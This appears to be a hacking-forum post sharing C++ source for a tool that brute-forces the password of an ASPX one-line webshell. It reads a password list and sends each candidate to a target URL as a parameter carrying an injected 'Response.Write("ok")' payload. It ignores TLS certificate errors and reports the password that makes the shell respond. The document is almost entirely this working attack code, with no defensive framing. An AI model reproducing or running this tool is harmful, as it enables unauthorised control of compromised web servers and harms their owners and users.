ASPX一句话爆破工具
#include "stdafx.h" #include <stdio.h> #include <Windows.h> #include <stdlib.h> #include <string.h> #include <string> #include <winhttp.h> #pragma comment(lib,"winhttp.lib") void banner() //显示banner { printf("[-]:Webshell Aspx crack T00ls\r\n[-]:Welcome www.90sec.org\r\n"); } int _tmain(int argc, _TCHAR * argv []) { DWORD dwsize = 0; LPSTR pszOutBuffer; LPBYTE lpHeader, lpData; LPCWSTR Host = argv[1]; LPCWSTR Url = argv[2]; char buf[MAX_PATH] = {0}; //fgets接收字符串 FILE* fp; int i = 0; if (argc < 4) //如果入口长度小于4 { banner(); printf("[-]:%S Host Domain_Url Password_List\r\n",argv[0]); return 0; } if ((fp = _wfopen(argv[3],L"rb")) == NULL) //打开文件,如果不存在 { printf("File not found\r\n"); //打印错误 return 0; } while ((fgets(buf,MAX_PATH,fp))) //这儿注意,fgets读取文件,默认一行尾端会增加一个回车,我就是在这儿卡了一晚上 { buf[strlen(buf) - 2] = '\0'; //倒数第二个字符,也就是回车,替换 HINTERNET Hinternet = WinHttpOpen(L"HttpClient 1.0", //定义访问sessions WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS,0); if (Hinternet == NULL) //如果定义访问的sessions为空 { printf("Failed to Initialize http sessions\r\n"); return 0; } HINTERNET Hconnect = WinHttpConnect(Hinternet, //初始化连接 Host, //定义地址 INTERNET_DEFAULT_HTTPS_PORT,//默认端口443 0); if (Hconnect == NULL) //如果为空,就close winhttp句柄 { printf("Hconnect error\r\n"); WinHttpCloseHandle(Hinternet); return 0; } WCHAR* res = new WCHAR[MAX_PATH + 1]; //释放内存,准备写入数据 wsprintf(res,L"%s?%S=Response.Write(\"ok\");Response.End()",Url,buf); //写入字符串到释放内存的变量里 HINTERNET Hrequest = WinHttpOpenRequest(Hconnect, //准备传输,定义好格式 L"GET", res, L"HTTP /1.1", WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, WINHTTP_FLAG_SECURE|WINHTTP_FLAG_REFRESH); if (Hrequest == NULL) { WinHttpCloseHandle(Hinternet); WinHttpCloseHandle(Hconnect); return 0; } DWORD dwFlags; DWORD dwBuffLen = sizeof(dwFlags); WinHttpQueryOption (Hrequest, WINHTTP_OPTION_SECURITY_FLAGS, //设置查询选项 (LPVOID)&dwFlags, &dwBuffLen); dwFlags |= SECURITY_FLAG_IGNORE_UNKNOWN_CA; dwFlags |= SECURITY_FLAG_IGNORE_CERT_DATE_INVALID; dwFlags |= SECURITY_FLAG_IGNORE_CERT_CN_INVALID; dwFlags |= SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE; WinHttpSetOption (Hrequest, WINHTTP_OPTION_SECURITY_FLAGS, //设置选项 &dwFlags, sizeof (dwFlags) ); if (WinHttpSendRequest(Hrequest, //发送数据 WINHTTP_NO_ADDITIONAL_HEADERS,0, WINHTTP_NO_REQUEST_DATA,0,0,0) == FALSE) { DWORD err = GetLastError(); WinHttpCloseHandle(Hrequest); WinHttpCloseHandle(Hconnect); WinHttpCloseHandle(Hinternet); return 0; } if (WinHttpReceiveResponse(Hrequest,NULL) == FALSE) //开始读取相应 { DWORD err = GetLastError(); WinHttpCloseHandle(Hrequest); WinHttpCloseHandle(Hconnect); WinHttpCloseHandle(Hinternet); return 0; } DWORD dwSize = 0; if (!WinHttpQueryDataAvailable( Hrequest, &dwSize)) //检查是否还有数据接受 printf( "Error %u in WinHttpQueryDataAvailable.\n", GetLastError()); WinHttpQueryHeaders(Hrequest, //查看http响应头 WINHTTP_QUERY_RAW_HEADERS_CRLF, WINHTTP_HEADER_NAME_BY_INDEX,NULL, &dwsize,WINHTTP_NO_HEADER_INDEX); lpHeader = (LPBYTE)HeapAlloc(GetProcessHeap(), 0, dwsize); WinHttpQueryHeaders(Hrequest, WINHTTP_QUERY_RAW_HEADERS_CRLF, WINHTTP_HEADER_NAME_BY_INDEX, lpHeader, &dwsize, WINHTTP_NO_HEADER_INDEX); HeapFree(GetProcessHeap(), 0, lpHeader); DWORD dwDownloaded = 0; pszOutBuffer = new char[dwSize+1]; if (!pszOutBuffer) { printf("Out of memory\n"); } ZeroMemory(pszOutBuffer, dwSize+1); if (!WinHttpReadData( Hrequest, (LPVOID)pszOutBuffer, dwSize, &dwDownloaded)) { printf( "Error %u in WinHttpReadData.\n", GetLastError()); } if (strstr(pszOutBuffer,"ok")) { printf("Line:%d-->Find password Success:%s\n",++i,buf); return 0; }else { printf("Line:%d-->password Not found:%s\n",++i,buf); } } delete[] pszOutBuffer; //delete[] res; return 0; }